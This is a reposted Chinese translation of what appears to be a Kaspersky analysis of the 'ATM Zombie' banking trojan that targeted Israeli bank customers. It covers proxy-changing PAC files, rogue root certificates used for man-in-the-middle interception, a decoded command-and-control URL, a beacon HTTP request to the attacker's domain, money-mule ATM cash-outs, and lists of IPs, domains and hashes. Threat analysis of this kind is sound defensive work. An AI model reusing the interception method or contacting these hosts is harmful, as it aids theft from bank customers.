转载

ATM僵尸：第一款窃取以色列银行金钱的木马

2015年11月，卡巴斯基实验室的研究人员发现了一种银行木马-ATM僵尸，它被认为是第一款能够从以色列银行窃取金钱的恶意软件。它采用狡猾的注入和其他复杂、隐蔽的方式进行偷窃。第一个方法被称为”代理改变”，常用于HTTP数据包检查，它涉及到修改浏览器代理配置、捕捉客户端和服务器的流量、作为中间人攻击中的中间人。

虽然测试非常有效，但是泄露银行信息却一点都不简单。银行使用加密信道，进行授权证书签名，以防止数据用明文流传输。但是，攻击者们找到了可以利用的地方，他们可以在受害者的机器中发布自己的证书，这个证书被嵌入到dropper并被插入到普通浏览器的root CA列表中。

使用”代理改变”木马来窃取银行凭据的方法在 2005年底就已经出现了，巴西的网络犯罪分子正在积极的使用这种方法。但是，直到2012年，卡巴斯基实验室的研究人员才公布了它的完全攻击分析。卡巴斯基实验室高级研究员Fabio Assolini在他的文章中说到：”巴西的银行木马的恶意PAC文件自2009年开始普及，几个木马家族如Trojan.Win32.ProxyChanger开始强制浏览器中的PAC文件的URL感染机器。”

卡巴斯基实验室的研究员根据俄罗斯的情况写了一篇和木马攻击PSB-retail客户相似的文章，这种攻击被称为 Tochechnyj Banker 。公司甚至伪装成一个受害者来支持案例研究，用这种方式解释了攻击者是如何欺骗受害者并掌控他的证书的。

以色列银行事件和上面的原理相似，但是偷钱的方法却非常有趣且新颖。新的作案方法不用仅仅依赖直接电汇或交易凭证，而是利用银行联机功能的一个漏洞，再通过ATM机取钱，协助不太清楚工作原理的攻击者窃取金钱，因此这种木马被称为ATM僵尸。

ATM僵尸：第一款窃取以色列银行金钱的木马

这种威胁在银行恶意软件界是非常活跃的，因为它被发现还注册了以下木马领域： Corebot , Pkybot 和最近的 AndroidLocker 。然而，没有人使用相同的手法进行攻击。此外，这种方法已经被研究人员追踪，并且不少在线流氓服务都使用了这种方法，如恶意软件加密、信用卡转让出售等。

2012年，跟PSB-retail攻击相似的木马 Retefe Banking Trojan 于去年八月被PaloAlto网络发现，这个木马很像是ATM僵尸的”哥哥”。它包含了一个额外的ATM僵尸中没有的Smoke Loader后门。其他类似的银行木马都被IBM Trusteer认定为 Tsukuba 。

代理配置文件必须明确它瞄准的细节，这样它才能轻松的被锁定。攻击成功的破坏了成百上千个受害者的机器，但是卡巴斯基实验室只能追踪到其中的十几个。

概览

该木马进入受害者机器，然后开始解包过程。一旦在常见浏览器(Opera, Firefox)中解开它存储的证书，并修改其配置来匹配中间人攻击。它消除所有可能的代理而不是恶意软件，然后把缓存权限改为只读。它没有继续修改使用Base64加密字符串的注册表项，这个注册表项包含一个自动配置内容(如使用CAP文件语法的流量捕获条件)的路径然后安装自己的签名证书到根目录中。之后它等待受害者登录到自己的银行账户窃取其证书，和使用了其姓名的日志，然后利用短信特征把钱发给ATM僵尸。

ATM僵尸：第一款窃取以色列银行金钱的木马

分析

在加载恶意软件执行你最喜欢的汇编级分析调试的恶意软件后，它能够捕捉到运行时产生的虚拟分配过程。把断点加载在正确的指令点会披露解压的可执行文件。一旦完成最终历程，MZ头会出现在内存中。有很多技术和工具可以这样做，但是这种方法已经足够解包恶意软件了。

ATM僵尸：第一款窃取以色列银行金钱的木马

查看恶意软件的汇编代码，我们能够确定一些被嵌入到数据块中的很多字符串。我们最开始发现的是Base64字符串，它包含了一些对外通信的URL，这意味着它被嵌入到了注册表项中。

ATM僵尸：第一款窃取以色列银行金钱的木马

字符串解码为：

http://retsback.com/config/cfg.pac

附注：这不是被嵌入到浏览器网络配置中的PAC文件，因此我们相信这个东西是攻击者生成的备份，防止原版PAC失效。

ATM僵尸：第一款窃取以色列银行金钱的木马

我们发现的另外两个Base64字符串就都是PAC，被嵌入到了浏览器网络配置中；另一种类型的URL表明攻击者选择的横向运动类型。

ATM僵尸：第一款窃取以色列银行金钱的木马

Base64字符串中的URL被添加到一个HTTP请求中，他被检测作为一个尝试进行沙箱指纹识别。空参数被Windows ProductID、二进制名称和1到5之间的整数反馈。这个整数是恶意软件被分配的完整性的水平，其中，(1)是不可信任水平，(5)是系统水平。这三个动态值是一个静态的版本值。

GET

/z/rtback.php?id=[WindowsProductID]&ver=0000002&name=[malware_filename]&ilvl=[integrity_level] HTTP/1.1

Host: retsback.com

Cache-Control: no-cache

通过查看二进制流，我们发现它使用一个证书通过HTTPS来涌出数据并安全的窃取受害者证书。

ATM僵尸：第一款窃取以色列银行金钱的木马

在嵌入上面的证书和代理配置到受害者机器后，当受害者决定登录他的银行时，浏览器被设置通过攻击者的服务器路由通信。

攻击者不仅诱骗作为以色列银行客户的受害者下载恶意软件，还针对特定银行的用户进行攻击。这需要很好的情报手机技术或者是内部人员才能完成窃取客户名单列表。黑客收集到一个列表后，整个攻击会变得非常有效率，攻击者能够定制每个email或者链接攻击特定的受害者或者银行。

以下是恶意软件的伪代码：

ATM僵尸：第一款窃取以色列银行金钱的木马

走出rabbit hole

该恶意软件是攻击的第一步。第二步包括手动登入被攻击账户，然后将钱转移到钱骡的账户。这是一个非常关键的步骤，因为跨越这步意味着恶意软件成功完成了它的作用。

手动登录到受害人的银行帐号依然不能掉以轻心。世界各地的银行都在使用指纹设备确保用户从受信任的设备中登入。对于不受信的设备，银行将发行扩展保护机制来防止这篇文章中提到的强制攻击。另外，银行追踪异常会发警报给其安全人员。

ATM僵尸：第一款窃取以色列银行金钱的木马

在银行的支持团队会宣布用户的钱消失之前，攻击者会发出金钱转移的指令到钱骡的手机号码并发布这个人的身份信息。我们把这种钱骡称为”僵尸”，在调查中，我们发现青少年被诱骗到ATM提取现金，然后他们获得一小部分作为报酬。后来，攻击者通过不同的媒体(比如邮局)获取剩下的钱。该活动被命名为钱骡（money mule）和他们所使用的技术。

Tips： 钱骡(Money mule)指通过因特网将用诈骗等不正当手段从一国得来的钱款和高价值货物转移到另一国的人，款物接收国通常是诈骗份子的居住地。

该技术允许攻击者保持匿名状态并且可以远程监视整个活动。它还指出了新的攻击类型，即攻击者控制该国居民作为内部人员或者传送这操作基本服务。这种服务可能导致它的执行者被指控犯罪，然而，证明他们知道整个操作的可能性几乎为零。毕竟，他们做的事情并没有太大恶意。

通过阅读银行的指令，非注册用户能够研究已经有五年历史的特征并分析汇钱的攻击方式。这种特性被称为”SMS transaction”短信交易，在过去几年中这种方法被广泛使用，举个例子，它允许家长把钱汇给没有信用卡的在服兵役或者学校里学习的孩子。

授权取现的SMS短信中还包含了几个独特的信息，如日期，以色列ID，名称和手机所有人。

卡巴斯基实验室发现了一种新的方式防止已经存在很多年的代理更换。详情戳这里。

以色列银行使用卡巴斯基实验室的关于攻击者、恶意活动和受害者的信息和数据成功阻止了攻击。

FAQs

问：攻击者的目标是以色列的银行？

答：是的

问：攻击者窃取的金钱来自受害者账户还是银行？

答：钱是从受害者的账户中被盗取的，但银行补偿了每个受害者。所以，最终的损失方是银行。

问：攻击完全停止了吗？

答：据我们所知，银行能够完全阻止攻击并给予受害者赔偿。

问：有多少用户受到了攻击？

答：卡巴斯基安全网络显示共有数十名受害者，但是，我们估计受害者的数量会达到近200人。

问：攻击者共窃取了多少钱？

答：最高的一笔转账约750美元。我们还能找到很多钱骡，大约有十种不同的恶意二进制文件，很多很银行的用户都遭到了攻击。根据这些特征，我们发现在短期内数十万美金被盗。如果卡巴斯基实验室没有进行大规模调查，被盗金额可能会大幅上升。

问：警察参与调查了吗？

答：我们不清楚任何调查细节。

问：到底谁是攻击者？

答：卡巴斯基实验室没有找到攻击者，但是，公司的研究人员已经把所有信息都发送给了执法部门，希望他们能抓到这次活动背后的犯罪分子。

问：我们怎么做才能保护自己的账户？

答：确保你已经安装了反恶意软件产品并安装了最新的补丁。

IP地址：

91.230.211.206

185.86.77.153

91.215.154.90

88.214.236.121

域：

retsback.com

updconfs.com

systruster.com

msupdcheck.com

样本：

6d11090c78e6621c21836c98808ff0f4	Trojan-Banker.Win32.Capper.zym
4c5b7a8187475be251d05655edcaccbe	Trojan-Banker.Win32.Capper.zyt
c0201ab2a45bc0e17ebd186059d5a59e	Trojan-Banker.Win32.Capper.zyk
47b316e3227d618089eb1625c4202142	Trojan-Banker.Win32.Capper.zyl
84bb5a77e28b3539a8022bc3612d4f4c	PAC file example
d2bf165284ab1953a96dfa7b642637a8	Trojan-Banker.Win32.Capper.zyp
80440e78a68583b180ad4d3e9a676a6e	Trojan-Banker.Win32.Capper.zyq
d08e51f8187df278296a8c4ff5cff0de	Trojan-Banker.Win32.Capper.zyg
efa5ea2c511b08d0f8259a10a49b27ad	Trojan-Banker.Win32.Capper.zys
13d9352a27b626e501f5889bfd614b34	Trojan-Banker.Win32.Capper.zyf
e5b7fd7eed59340027625ac39bae7c81	Trojan-Banker.Win32.Capper.zyj